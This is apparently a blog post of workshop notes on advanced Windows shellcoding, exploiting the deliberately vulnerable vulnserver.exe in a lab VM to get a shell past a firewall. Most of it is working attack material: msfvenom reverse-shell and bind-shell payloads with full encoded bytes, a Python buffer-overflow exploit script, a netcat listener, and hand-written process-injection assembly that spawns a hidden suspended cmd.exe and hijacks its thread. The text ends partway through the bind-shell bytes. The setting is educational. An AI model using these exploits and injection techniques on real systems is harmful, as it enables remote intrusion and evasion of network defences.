Advanced Shellcoding Workshop

Today I attended an advanced shellcoding workshop organized by Div0 and taught by Arnold Anthony. Previously I had attended the basics of buffer overflow and custom shellcoding workshop taught by him but I had lost the notes, so this time I'm going to post my notes here so I won't lose them again.

A few minutes after the workshop started, the courier came knocking on my door and delivered the @WakeTheCrew espresso coffee concentrate (highly recommended!) that I had ordered 2 days ago. After enjoying a cup of cold brew coffee, I was ready to start hacking!

Arnold starts by explaining the goal of this workshop. Sometimes during reconnaissance, we might know the server is running a vulnerable process but is protected by firewall and thus, we cannot get a reverse/bind shell. In this workshop, he explained how to create a shellcode that rebinds the socket to the same port that's allowed by the firewall, so we can connect to it.

In this workshop, we're using Win7 VM which had ASLR disabled on purpose. In real world, generally we will need to bypass ASLR, however this will be out of the scope of this workshop.

Here's the IP addresses of the VMs I'm using.

  • Win7: 172.16.202.133
  • Kali Linux: 172.16.202.130

Why and when does a rebind socket needed?

First, let's review a situation when a rebind shell is not needed.

In our PoC (proof of concept), a vulnerable server vulnserver.exe was started in the Win7 VM.

I started by port scanning the Win7 machine using nmap in Kali:

nmap -sS 172.16.202.133
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 10:17 +08
Nmap scan report for 172.16.202.133
Host is up (0.00056s latency).
Not shown: 988 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
2869/tcp  open  icslap
5357/tcp  open  wsdapi
9999/tcp  open  abyss     <------ vulnserver.exe
10243/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
MAC Address: 00:0C:29:73:49:4C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.83 seconds

I can see there are a lot of services running, one of them is port 9999 served by our vulnserver .

Here I created a Windows reverse shell payload using msfvenom which generates a shellcode for Python script. A vulnerable process receiving this payload will connect to my Kali machine over port 4444.

msfvenom -a x86 -platform Windows -p windows/shell_reverse_tcp lhost=172.16.202.130 lport=4444 -e x86/shikata_ga_nai -b "\x00" -f python

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1712 bytes
buf =  b""
buf += b"\xda\xcb\xd9\x74\x24\xf4\x5d\xb8\xd8\xea\xce\x07\x33"
buf += b"\xc9\xb1\x52\x31\x45\x17\x03\x45\x17\x83\x1d\xee\x2c"
buf += b"\xf2\x61\x07\x32\xfd\x99\xd8\x53\x77\x7c\xe9\x53\xe3"
buf += b"\xf5\x5a\x64\x67\x5b\x57\x0f\x25\x4f\xec\x7d\xe2\x60"
buf += b"\x45\xcb\xd4\x4f\x56\x60\x24\xce\xd4\x7b\x79\x30\xe4"
buf += b"\xb3\x8c\x31\x21\xa9\x7d\x63\xfa\xa5\xd0\x93\x8f\xf0"
buf += b"\xe8\x18\xc3\x15\x69\xfd\x94\x14\x58\x50\xae\x4e\x7a"
buf += b"\x53\x63\xfb\x33\x4b\x60\xc6\x8a\xe0\x52\xbc\x0c\x20"
buf += b"\xab\x3d\xa2\x0d\x03\xcc\xba\x4a\xa4\x2f\xc9\xa2\xd6"
buf += b"\xd2\xca\x71\xa4\x08\x5e\x61\x0e\xda\xf8\x4d\xae\x0f"
buf += b"\x9e\x06\xbc\xe4\xd4\x40\xa1\xfb\x39\xfb\xdd\x70\xbc"
buf += b"\x2b\x54\xc2\x9b\xef\x3c\x90\x82\xb6\x98\x77\xba\xa8"
buf += b"\x42\x27\x1e\xa3\x6f\x3c\x13\xee\xe7\xf1\x1e\x10\xf8"
buf += b"\x9d\x29\x63\xca\x02\x82\xeb\x66\xca\x0c\xec\x89\xe1"
buf += b"\xe9\x62\x74\x0a\x0a\xab\xb3\x5e\x5a\xc3\x12\xdf\x31"
buf += b"\x13\x9a\x0a\x95\x43\x34\xe5\x56\x33\xf4\x55\x3f\x59"
buf += b"\xfb\x8a\x5f\x62\xd1\xa2\xca\x99\xb2\x60\x1a\x6b\xc0"
buf += b"\x11\x19\x6b\xd4\xbd\x94\x8d\xbc\x2d\xf1\x06\x29\xd7"
buf += b"\x58\xdc\xc8\x18\x77\x99\xcb\x93\x74\x5e\x85\x53\xf0"
buf += b"\x4c\x72\x94\x4f\x2e\xd5\xab\x65\x46\xb9\x3e\xe2\x96"
buf += b"\xb4\x22\xbd\xc1\x91\x95\xb4\x87\x0f\x8f\x6e\xb5\xcd"
buf += b"\x49\x48\x7d\x0a\xaa\x57\x7c\xdf\x96\x73\x6e\x19\x16"
buf += b"\x38\xda\xf5\x41\x96\xb4\xb3\x3b\x58\x6e\x6a\x97\x32"
buf += b"\xe6\xeb\xdb\x84\x70\xf4\x31\x73\x9c\x45\xec\xc2\xa3"
buf += b"\x6a\x78\xc3\xdc\x96\x18\x2c\x37\x13\x28\x67\x15\x32"
buf += b"\xa1\x2e\xcc\x06\xac\xd0\x3b\x44\xc9\x52\xc9\x35\x2e"
buf += b"\x4a\xb8\x30\x6a\xcc\x51\x49\xe3\xb9\x55\xfe\x04\xe8"

I pasted the generated payload in my Python script exp.py , where 0x625011af is the “JMP ESP” address. Arnold said he won't explain how we get to this address since that's covered in the previous Buffer Overflow workshop.

# !/usr/bin/python
import socket
import sys

buf =  b""
buf += b"\xda\xcb\xd9\x74\x24\xf4\x5d\xb8\xd8\xea\xce\x07\x33"
buf += b"\xc9\xb1\x52\x31\x45\x17\x03\x45\x17\x83\x1d\xee\x2c"
buf += b"\xf2\x61\x07\x32\xfd\x99\xd8\x53\x77\x7c\xe9\x53\xe3"
buf += b"\xf5\x5a\x64\x67\x5b\x57\x0f\x25\x4f\xec\x7d\xe2\x60"
buf += b"\x45\xcb\xd4\x4f\x56\x60\x24\xce\xd4\x7b\x79\x30\xe4"
buf += b"\xb3\x8c\x31\x21\xa9\x7d\x63\xfa\xa5\xd0\x93\x8f\xf0"
buf += b"\xe8\x18\xc3\x15\x69\xfd\x94\x14\x58\x50\xae\x4e\x7a"
buf += b"\x53\x63\xfb\x33\x4b\x60\xc6\x8a\xe0\x52\xbc\x0c\x20"
buf += b"\xab\x3d\xa2\x0d\x03\xcc\xba\x4a\xa4\x2f\xc9\xa2\xd6"
buf += b"\xd2\xca\x71\xa4\x08\x5e\x61\x0e\xda\xf8\x4d\xae\x0f"
buf += b"\x9e\x06\xbc\xe4\xd4\x40\xa1\xfb\x39\xfb\xdd\x70\xbc"
buf += b"\x2b\x54\xc2\x9b\xef\x3c\x90\x82\xb6\x98\x77\xba\xa8"
buf += b"\x42\x27\x1e\xa3\x6f\x3c\x13\xee\xe7\xf1\x1e\x10\xf8"
buf += b"\x9d\x29\x63\xca\x02\x82\xeb\x66\xca\x0c\xec\x89\xe1"
buf += b"\xe9\x62\x74\x0a\x0a\xab\xb3\x5e\x5a\xc3\x12\xdf\x31"
buf += b"\x13\x9a\x0a\x95\x43\x34\xe5\x56\x33\xf4\x55\x3f\x59"
buf += b"\xfb\x8a\x5f\x62\xd1\xa2\xca\x99\xb2\x60\x1a\x6b\xc0"
buf += b"\x11\x19\x6b\xd4\xbd\x94\x8d\xbc\x2d\xf1\x06\x29\xd7"
buf += b"\x58\xdc\xc8\x18\x77\x99\xcb\x93\x74\x5e\x85\x53\xf0"
buf += b"\x4c\x72\x94\x4f\x2e\xd5\xab\x65\x46\xb9\x3e\xe2\x96"
buf += b"\xb4\x22\xbd\xc1\x91\x95\xb4\x87\x0f\x8f\x6e\xb5\xcd"
buf += b"\x49\x48\x7d\x0a\xaa\x57\x7c\xdf\x96\x73\x6e\x19\x16"
buf += b"\x38\xda\xf5\x41\x96\xb4\xb3\x3b\x58\x6e\x6a\x97\x32"
buf += b"\xe6\xeb\xdb\x84\x70\xf4\x31\x73\x9c\x45\xec\xc2\xa3"
buf += b"\x6a\x78\xc3\xdc\x96\x18\x2c\x37\x13\x28\x67\x15\x32"
buf += b"\xa1\x2e\xcc\x06\xac\xd0\x3b\x44\xc9\x52\xc9\x35\x2e"
buf += b"\x4a\xb8\x30\x6a\xcc\x51\x49\xe3\xb9\x55\xfe\x04\xe8"

shellcode = "A" * 2003 + "\xaf\x11\x50\x62" +"\x90"*10+ buf + "C"*(3000-len(buf)-4-2003-10) # 625011af

try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connect=s.connect(('172.16.202.133',9999))
        s.send(('TRUN /.:/'+shellcode))
        print("Fuzzing with TRUN comamnd with %s bytes"% str(len(shellcode)))
        s.close()
except:
        print("Error connecting to server")
        sys.exit()

So I started a netcat listener in a new console tab in Kali:

nc -lvp 4444

Then I ran the exploit script:

python exp.py

When I checked netcat I can see a Windows command prompt was displayed. This means the Python script successfully connected to my Win7 machine over port 9999, then the shellcode creates a reverse shell using a random local port, which calls back to my netcat listener on my Kali machine over port 4444:

C:\Users\test\Desktop>netstat -ano | findstr 4444
netstat -ano | findstr 4444
  TCP    172.16.202.133:49175   172.16.202.130:4444    ESTABLISHED     2212

Imagine if there is a firewall that blocks connection to custom ports like 4444. In this case, there is no way we can get the reverse shell to work.

To simulate this scenario, I disabled all inbound rules in "Windows Firewall" which allowed external connections to connect to this machine. Then I created a new rule which only allow inbound connections to port 9999.

  • Inbound Rules > Select all > Disable rule
  • Action > New Rule > Port > Specify TCP port 9999 > Allow the conection > Next > Give a name > Finish

Next, I configured the firewall to block all outbound connections from this Win7 VM:

  • Right click on "Windows Firewall with Advanced Security" > Properties > Domain Profile/Private Profile/Public Profile > Outbound connections > Block > OK

Alt Text

Now when I do a port scan, I can confirm the only exposed port in Win7 is port 9999. In real world, if we see only one or two ports exposed, this means there's probably a firewall involved.

nmap 172.16.202.133
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 11:03 +08
Nmap scan report for 172.16.202.133
Host is up (0.00038s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
9999/tcp open  abyss
MAC Address: 00:0C:29:73:49:4C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds

If I re-run netcat and the Python script again, this time we will not get a shell. Even though the script was able to connect to port 9999 and exploited the server, the firewall blocked outbound connection to my Kali machine.

So the goal of this workshop is to figure out how we can get a shell even in this situation.


How does a Rebind Socket work

Overview:

  • Create a suspended cmd.exe process via shellcode.
  • In cmd.exe process, allocate a memory space.
  • Write a shellcode inside this allocated memory.
  • Using primary thread in cmd.exe process, get the EIP register value.
  • Change EIP register value into the allocated memory address.
  • Now that EIP is pointed to the memory, resume the thread to execute the bind shell.
  • Terminate the vulnserver.exe

In the rest of the post, I will explain steps by steps how to do this.


Step 1 - Create a process

Open vulnserver.exe in Immunity Debugger. Click play button to run the application. In the bottom input field, type bp 0x625011af to create a breakpoint at the memory address defined in the Python script.

Click "b" button in Immunity Debugger to check the breakpoint is put in place, click "c" to come back to the main window.

Then I removed the previous shellcode in the Python script and run the script. I can see in that execution stopped at the breakpoint ( JMP ESP ).

Alt Text

Then I step over the code using F8, or by clicking the down arrow icon (third button after Play button).

Here is where I will create a new process using Windows API CreateProcessA.

According to MSDN, these are the arguments needed to construct CreateProcessA:

BOOL CreateProcessA(
  LPCSTR                lpApplicationName,
  LPSTR                 lpCommandLine,
  LPSECURITY_ATTRIBUTES lpProcessAttributes,
  LPSECURITY_ATTRIBUTES lpThreadAttributes,
  BOOL                  bInheritHandles,
  DWORD                 dwCreationFlags,
  LPVOID                lpEnvironment,
  LPCSTR                lpCurrentDirectory,
  LPSTARTUPINFOA        lpStartupInfo,
  LPPROCESS_INFORMATION lpProcessInformation
);

Out of all these arguments, I will leave most of them null. There are only 4 arguments that are important.

lpCommandLine : specify a string value of the command we want to run here, in this case it will be "cmd".

dwCreationFlags : specify a flag that creates a suspended process with no window shown.

lpStartupInfo : points to a structure containing 18 arguments for the window, which should be all null because we want the process hidden at all times.

lpProcessInformation : points to the most important structure that will be used to get the handle of the process. In the structure, hProcess and hThread will be the handle that we want to control, depending on if we want to get hold of the process or thread.

Now, I will start creating the argument.

Use any "ASCII to Hex" online tool to convert "cmd" string to hex:

63 6d 64

The string has to be terminated by adding 0x00 (null byte) at the end.

63 6d 64 00

When putting the values in the stack, it has to be in reverse order:

00 64 6d 63

However zeroes is considered bad character in a shellcode, so we have to make sure this doesn't show up.

In Immunity Debugger, press spacebar at NOP , or double click it.

There are many options to avoid bad character in the shellcode. One method we can use is to add a value that does not end in 00, then add or subtract from it.

In this example I'm using a general purpose register EDX.

MOV EDX,10747d73

Then we will subtract 10101010 from EDX:

SUB EDX,10101010

The value stored in EDX register will end up with 0x00646d63 (the equivalent hex value of "cmd" in ASCII). Push it to the stack:

PUSH EDX

If I step over I can see the address of the stack frame which stores the "cmd" string in the bottom right pane of Immunity Debugger. Next I will get the value of the address from the stack and put into another general purpose register such as EBX. This will be used later as the value for lpCommandLine .

MOV EBX,ESP

I can create values for the other arguments on the fly, but let's focus on lpStartupInfo structure next.

Since these are all null, I'll use XOR to create a zero value and save it in a general purpose register such as ECX:

XOR ECX,ECX

The value shown on the left side ("33 C9") is the shellcode payload for this null value. I will push this 17 times for all the lpStartupInfo arguments.

PUSH ECX

Next I will save the address in the stack frame that points to this lpStartupInfo structure into another register, such as ESI.

MOV ESI,ESP

The value stored in ESI is a memory address that points to lpStartupInfo , for example this would be something like 0x0194F998 .

lpProcessInformation is another structure needed in CreateProcessA . Though we can use any memory address we want to populate this information into, I'll give it 4 bytes offset from 0x0194F998 , which is 0x0194F99C .

I'll assign this memory address value to EDI:

MOV EDI,ESI
ADD EDI,4

So far:

  • ESI contains the memory address of lpStartupInfo

  • EDI contains the memory address of lpProcessInformation

Push both to the stack:

PUSH EDI
PUSH ESI

Next argument in CreateProcessA structure will be 2 nulls:

BOOL CreateProcessA(
  LPCSTR                lpApplicationName, # null
  LPSTR                 lpCommandLine, # string "cmd" that's stored in EBX
  LPSECURITY_ATTRIBUTES lpProcessAttributes, # null
  LPSECURITY_ATTRIBUTES lpThreadAttributes, # null
  BOOL                  bInheritHandles, # null
  DWORD                 dwCreationFlags, # string "0800004" that's stored in ECX
  LPVOID                lpEnvironment, # null
  LPCSTR                lpCurrentDirectory, # null
  LPSTARTUPINFOA        lpStartupInfo, # memory address stored in ESI
  LPPROCESS_INFORMATION lpProcessInformation # memory address stored in EDI
);

So we push ECX which contains zero value two times:

PUSH ECX
PUSH ECX

Then for dwCreationFlags we need to create a value 0x0800004 .

Why this value, you ask? Refer to the Process Creation Flags section in MSDN. This is the sum of two values that I want the process to be created with:

  • 0x0000004: suspended process
  • 0x0800000: no window

0x0800004 contains bad character because it ends in null byte (zero value). ECX register already contains zero, so I will reuse it for this operation. Here I added a value that does not contain bad character, then substract accordingly to get the value that we want:

MOV ECX,9010105
SUB ECX,1010101
PUSH ECX

Finally I push 3 nulls for the next 3 arguments.

XOR ECX,ECX
PUSH ECX
PUSH ECX
PUSH ECX

Then push the last 2 values to complete the structure.

PUSH EBX
PUSH ECX

MSDN describes that the API CreateProcessA is implemented in kernel32.dll. I can get the specific address of the API using tools like Arwin.

C:\Users\test\Desktop>arwin kernel32.dll CreateProcessA
arwin - win32 address resolution program - by steve hanna - v.01
CreateProcessA is located at 0x77de2082 in kernel32.dll

Now we know that the memory address where this CreateProcessA API lives is 0x77DE2082 , I can call this memory address directly to populate the structure in the stack.

CALL 77DE2082

Or call it like this. Note that the API name is case sensitive:

CALL kernel32.CreateProcessA

But I prefer to store the memory address of the API in a register before calling it:

MOV EBX,kernel32.CreateProcessA
CALL EBX

The LastErr ERROR_SUCCESS means that the API result was successful. But how do I check that the process was created successfully because we configured the process to remain stealth without opening any window?

I used Process Hacker to see that a new process cmd.exe was created under vulnserver.exe . Right clicking the cmd.exe process, I can see there is an option called "Resume". This implies that the process was created in "Suspended" mode, just like what we intended.


Step 2 - Allocate memory space to the process

The stack now will represent the structure of the process information:

typedef struct _PROCESS_INFORMATION {
  HANDLE hProcess; # 70
  HANDLE hThread;
  DWORD  dwProcessId;
  DWORD  dwThreadId;
} PROCESS_INFORMATION, *PPROCESS_INFORMATION, *LPPROCESS_INFORMATION;

In the stack, we can see that the memory address 0x0174F99C contains value 00000070 that gets populated by the process - this is value of hProcess , in other words, the process handle or remote control of the cmd.exe process.

The next step is to create memory allocation for the process using VirtualAllocEx API.

This is the structure of the API arguments:

LPVOID VirtualAllocEx(
  HANDLE hProcess, # 70
  LPVOID lpAddress, # null
  SIZE_T dwSize, # 01F4
  DWORD  flAllocationType, # 3000
  DWORD  flProtect # 40
);

Here's how I get the values for them:

  • dwsize: around 500 bytes of memory is needed, so converting the decimal value 500 to hex this value will be 0x01F4.
  • flAllocationType: 0x3000. This is the sum of the following:

    • MEM_COMMIT: 0x00001000
    • MEM_RESERVE: 0x00002000
  • flProtect: we want the memory to be executable, readable, and writable.

I pop the stack twice to get to the hProcess value 0x70 and loads it into ESI.

POP ESI
POP ESI

Next pop the top value of the stack into EDI.

POP EDI

Now I will start to construct the arguments for VirtualAllocEx . The first argument value is 0x40 which is fine to push as is:

PUSH 40

Next value is 0x3000 but this can't be pushed directly because contains null byte. So I'll do it like this:

XOR ECX,ECX
MOV CH,30

The third argument is dwSize which is 0x01F4 (500 bytes):

MOV CH,1
MOV CL,0F4
PUSH ECX

Next argument is null:

XOR ECX,ECX
PUSH ECX

Last argument hProcess is already stored in ESI register so I'll push it into the stack:

PUSH ESI

Finally I will call the API:

MOV EBX,kernel32.VirtualAllocEx
CALL EBX

This will return the result which is the address of the allocated memory in the EAX register.

How do we know that memory was allocated to the process?

I can attach the process to a debugger, in this case I'm using Windbg:

  • File > Attach to Process > select cmd.exe

To attach to the correct process, I'll make sure there are no other cmd.exe window open, however the process ID can be easily distinguished in Process Hacker.

Alt Text

Windbg Memory window will show the allocated memory address which is 160000. This shows that the memory is successfully allocated to the process.

I'll save the start of memory address somewhere, like in the EBP register.

MOV EBP,EAX

Step 3 - Move the bind shellcode into allocated memory.

The final payload will be a bind shellcode but I'll pop calculator as a PoC for now. Let's generate the shellcode using msfvenom and add it to the Python script:

msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f c

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 949 bytes
unsigned char buf[] = 
"\xda\xd7\xba\x48\x02\x1f\x0f\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
"\x31\x83\xc7\x04\x31\x57\x14\x03\x57\x5c\xe0\xea\xf3\xb4\x66"
"\x14\x0c\x44\x07\x9c\xe9\x75\x07\xfa\x7a\x25\xb7\x88\x2f\xc9"
"\x3c\xdc\xdb\x5a\x30\xc9\xec\xeb\xff\x2f\xc2\xec\xac\x0c\x45"
"\x6e\xaf\x40\xa5\x4f\x60\x95\xa4\x88\x9d\x54\xf4\x41\xe9\xcb"
"\xe9\xe6\xa7\xd7\x82\xb4\x26\x50\x76\x0c\x48\x71\x29\x07\x13"
"\x51\xcb\xc4\x2f\xd8\xd3\x09\x15\x92\x68\xf9\xe1\x25\xb9\x30"
"\x09\x89\x84\xfd\xf8\xd3\xc1\x39\xe3\xa1\x3b\x3a\x9e\xb1\xff"
"\x41\x44\x37\xe4\xe1\x0f\xef\xc0\x10\xc3\x76\x82\x1e\xa8\xfd"
"\xcc\x02\x2f\xd1\x66\x3e\xa4\xd4\xa8\xb7\xfe\xf2\x6c\x9c\xa5"
"\x9b\x35\x78\x0b\xa3\x26\x23\xf4\x01\x2c\xc9\xe1\x3b\x6f\x87"
"\xf4\xce\x15\xe5\xf7\xd0\x15\x59\x90\xe1\x9e\x36\xe7\xfd\x74"
"\x73\x17\xb4\xd5\xd5\xb0\x11\x8c\x64\xdd\xa1\x7a\xaa\xd8\x21"
"\x8f\x52\x1f\x39\xfa\x57\x5b\xfd\x16\x25\xf4\x68\x19\x9a\xf5"
"\xb8\x7a\x7d\x66\x20\x53\x18\x0e\xc3\xab";

I'll add some NOPs (no operation) to partition the rebind shellcode payload from the generated shellcode (our PoC that pops calc) to avoid risking them overwriting each other.

calc_shell=("\xda\xd7\xba\x48\x02\x1f\x0f\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
"\x31\x83\xc7\x04\x31\x57\x14\x03\x57\x5c\xe0\xea\xf3\xb4\x66"
"\x14\x0c\x44\x07\x9c\xe9\x75\x07\xfa\x7a\x25\xb7\x88\x2f\xc9"
"\x3c\xdc\xdb\x5a\x30\xc9\xec\xeb\xff\x2f\xc2\xec\xac\x0c\x45"
"\x6e\xaf\x40\xa5\x4f\x60\x95\xa4\x88\x9d\x54\xf4\x41\xe9\xcb"
"\xe9\xe6\xa7\xd7\x82\xb4\x26\x50\x76\x0c\x48\x71\x29\x07\x13"
"\x51\xcb\xc4\x2f\xd8\xd3\x09\x15\x92\x68\xf9\xe1\x25\xb9\x30"
"\x09\x89\x84\xfd\xf8\xd3\xc1\x39\xe3\xa1\x3b\x3a\x9e\xb1\xff"
"\x41\x44\x37\xe4\xe1\x0f\xef\xc0\x10\xc3\x76\x82\x1e\xa8\xfd"
"\xcc\x02\x2f\xd1\x66\x3e\xa4\xd4\xa8\xb7\xfe\xf2\x6c\x9c\xa5"
"\x9b\x35\x78\x0b\xa3\x26\x23\xf4\x01\x2c\xc9\xe1\x3b\x6f\x87"
"\xf4\xce\x15\xe5\xf7\xd0\x15\x59\x90\xe1\x9e\x36\xe7\xfd\x74"
"\x73\x17\xb4\xd5\xd5\xb0\x11\x8c\x64\xdd\xa1\x7a\xaa\xd8\x21"
"\x8f\x52\x1f\x39\xfa\x57\x5b\xfd\x16\x25\xf4\x68\x19\x9a\xf5"
"\xb8\x7a\x7d\x66\x20\x53\x18\x0e\xc3\xab")

shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90"*10 + payload + "C"*(2500-len(payload)-4-2003-10) + "\x90"*100 + calc_shell

To write this shellcode into the allocated memory, WriteProcessMemory API will be used here.

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer, # the address we want to start copying from stack. Choose from NOP area.
  SIZE_T  nSize, # 500 bytes (0x01F4)
  SIZE_T  *lpNumberOfBytesWritten # null
);

WriteProcessMemory accepts 5 arguments:

  • Last argument is null.

  • nSize: how many bytes of memory we're going to write (500 bytes).

  • lpBuffer: from where we're going to start writing from.

  • lpBaseAddress: the start of memory address allocated by the VirtualAllocEx

  • hProcess: the process handle

For the last argument, give it a null value:

XOR EBX,EBX
PUSH EBX

Second argument nSize is 500 (0x01F4)

MOV BH,1
MOV BL,0F4
PUSH EBX

Third argument is the lpBuffer .

Since we're trying to copy the data from the stack that contains our PoC shellcode into the memory address, select a few buffer in between to be safe. Ideally this should be up a few bytes, within the NOP sledges area.

Alt Text

How to measure the distance?

The generated msfvenom payload starts with "DA D7". Check where this resides in the stack, for example the value BAD7DA90 is stored at the address 017BFC30 . Double click that address, scroll up to see how far it is from the stack. The top of the stack, where the ESP register points to, is memory address 017BF99C and contains the value 01F4 . The debugger shows that the distance (offset) between this selected address and the top of stack is 274.

Alt Text

MOV EBX,ESP
ADD BX,274

Push all the remaining arguments to the stack:

PUSH EBX
PUSH EBP
PUSH ESI

Call WriteProcessMemory API:

MOV EBX,kernel32.WriteProcessMemory
CALL EBX

To confirm this operation is successful, in Windbg, clear the 160000 in Memory window and retype it to refresh the data. The memory should no longer contain zero data.


Step 4 - Get the EIP register value in the primary thread

Type tilda character ~ at the bottom of the Windbg Command window. This will return the threads, whereby 0 is the primary thread.

The GetThreadContext API will be used here:

BOOL GetThreadContext(
  HANDLE    hThread,
  LPCONTEXT lpContext
);

lpContext points to the context structure which is very big and needs to be far away from the stack.

Within the context structure, ContextFlags value should be 0x10001 which is the sum of:

  • 0x10000: indicates a 32-bit architecture (CONTEXT_i386)
  • 0x00001: get the value of EIP register

We'll choose an offset of 0x150 for example, so that when it populates the data, the data will not overwrite existing stuff in the stack.

MOV EBX, ESP
SUB BX,150

Create value 0x010001 in ECX:

XOR ECX,ECX
MOV CX,0FFFF
INC ECX <--- 0FFFF + 1 = 10000
INC ECX <--- 10000 + 1 = 10001

Move the value of ECX (0x10001) to the memory address location pointed by the address of EBX.

MOV DWORD PTR DS:[EBX],ECX

Push EBX. This will be the first argument lpContext :

PUSH EBX

Push the next argument hThread :

PUSH EDI

Call the API:

MOV EBX,kernel32.GetThreadContext
CALL EBX

Step 5 - Change EIP register value into the allocated memory address.

Now that EIP register value was retrieved via GetThreadContext , SetThreadContext can be used to set the value of EIP:

BOOL SetThreadContext(
  HANDLE        hThread,
  const CONTEXT *lpContext
);

In the debugger, double click the address of the stack, scroll up to the address where the thread starts, here's showing an offset value of 98.

Alt Text

MOV ECX,ESP
SUB CL,98

Point to EBP which contains the start of allocated memory address (160000):

MOV DWORD PTR DS:[ECX],EBP

Have to recreate the context structure because it was overwritten by the previous operation.

MOV EBX,ESP
SUB BX,150

Push the two arguments for SetThreadContext and call the API:

PUSH EBX
PUSH EDI
MOV EBX,kernel32.SetThreadContext
CALL EBX

In Windbg Command window, type the following command. "e" is to execute commands and "r" is to view registers, in the primary thread 0.

~0 e r

Check the value of EIP register to confirm if it was successfully overwritten to 16000


Step 6 - Resume the thread to execute the bind shell.

ResumeThread API only accepts one argument which is the thread handle:

DWORD ResumeThread(
  HANDLE hThread
);

Push this to the stack and call the API:

PUSH EDI
MOV EBX,kernel32.ResumeThread
CALL EBX

In Windbg Command window, type "G" to start the debugger, which will run the instruction at the memory address pointed by the EIP register. This will execute the PoC shellcode and a calculator window should pop up at this point.


Step 7 - Terminate the

vulnserver.exe

If I call the ExitProcess API here, it will exit the vulnserver process and make the port 9999 available again.

Before that, it's recommended to call the Sleep API to make our cmd.exe process sleep for 5 seconds so that the vulnserver process have enough time to exit and release the port 9999:

void Sleep(
  DWORD dwMilliseconds
);

Scroll down the stack, find somewhere in the NOP sledge which is closer to the bind shellcode to place the instructions which calls the Sleep API:

XOR ECX,ECX
MOV CL,88 
MOV CH,13 # hex value 0x1388 (5000 in decimal)
PUSH ECX
MOV EBX,kernel32.Sleep
CALL EBX

Remember to put some padding between Sleep and Bind Shell:

shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90"*10+ payload + "C"*(2500-len(payload)-4-2003-10) + "\x90"*100 + sleep + "\x90"*10 + calc_shell

Time to call the ExitProcess API:

void ExitProcess(
  UINT uExitCode
);

Give the ExitCode zero value:

XOR ECX,ECX
PUSH ECX
MOV EBX,kernel32.ExitProcess
CALL EBX 

Run the exploit and check if it's popping calculater after sleeping for 5 seconds. If everything's good, we can replace the payload so that instead of popping calc, creates a bind shell that accepts connection to port 9999 that has been released by the vulnserver process.

Generate a shellcode for the bind shell and assign the payload to a variable in the script.

 msfvenom -a x86 -platform Windows -p windows/shell_bind_tcp LPORT=9999 -e x86/shikata_ga_nai -b "\x00" -f c

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 355 (iteration=0)
x86/shikata_ga_nai chosen with final size 355
Payload size: 355 bytes
Final size of c file: 1516 bytes
unsigned char buf[] = 
"\xbb\x80\x9d\xd1\x48\xdb\xd4\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x53\x31\x5a\x12\x83\xea\xfc\x03\xda\x93\x33\xbd\x26\x43\x31"
"\x3e\xd6\x94\x56\xb6\x33\xa5\x56\xac\x30\x96\x66\xa6\x14\x1b"
"\x0c\xea\x8c\xa8\x60\x23\xa3\x19\xce\x15\x8a\x9a\x63\x65\x8d"
"\x18\x7e\xba\x6d\x20\xb1\xcf\x6c\x65\xac\x22\x3c\x3e\xba\x91"
"\xd0\x4b\xf6\x29\x5b\x07\x16\x2a\xb8\xd0\x19\x1b\x6f\x6a\x40"
"\xbb\x8e\xbf\xf8\xf2\x88\xdc\xc5\x4d\x23\x16\xb1\x4f\xe5\x66"
"\x3a\xe3\xc8\x46\xc9\xfd\x0d\x60\x32\x88\x67\x92\xcf\x8b\xbc"
"\xe8\x0b\x19\x26\x4a\xdf\xb9\x82\x6a\x0c\x5f\x41\x60\xf9\x2b"
"\x0d\x65\xfc\xf8\x26\x91\x75\xff\xe8\x13\xcd\x24\x2c\x7f\x95"
"\x45\x75\x25\x78\x79\x65\x86\x25\xdf\xee\x2b\x31\x52\xad\x23"
"\xf6\x5f\x4d\xb4\x90\xe8\x3e\x86\x3f\x43\xa8\xaa\xc8\x4d\x2f"
"\xcc\xe2\x2a\xbf\x33\x0d\x4b\x96\xf7\x59\x1b\x80\xde\xe1\xf0"
"\x50\xde\x37\x6c\x58\x79\xe8\x93\xa5\x39\x58\x14\x05\xd2\xb2"
"\x9b\x7a\xc2\xbc\x71\x13\x6b\x41\x7a\x3c\x63\xcc\x9c\x28\x6b"
"\x98\x37\xc4\x49\xff\x8f\x73\xb1\xd5\xa7\x13\xfa\x3f\x7f\x1c"
"\xfb\x15\xd7\x8a\x70\x7a\xe3\xab\x86\x57\x43\xbc\x11\x2d\x02"
"\x8f\x80\x32\x0f\x67\x20\xa0\xd4\x77\x2f\xd9\x42\x20\x78\x2f"
"\x9b\xa4\x94\x16\x35\xda\x64\xce\x7e\x5e\xb3\x33\x80\x5f\x36"
"\x0f\xa6\x4f\x8e\x90\xe2\x3b\x5e\xc7\xbc\x95\x18\xb1\x0e\x4f"
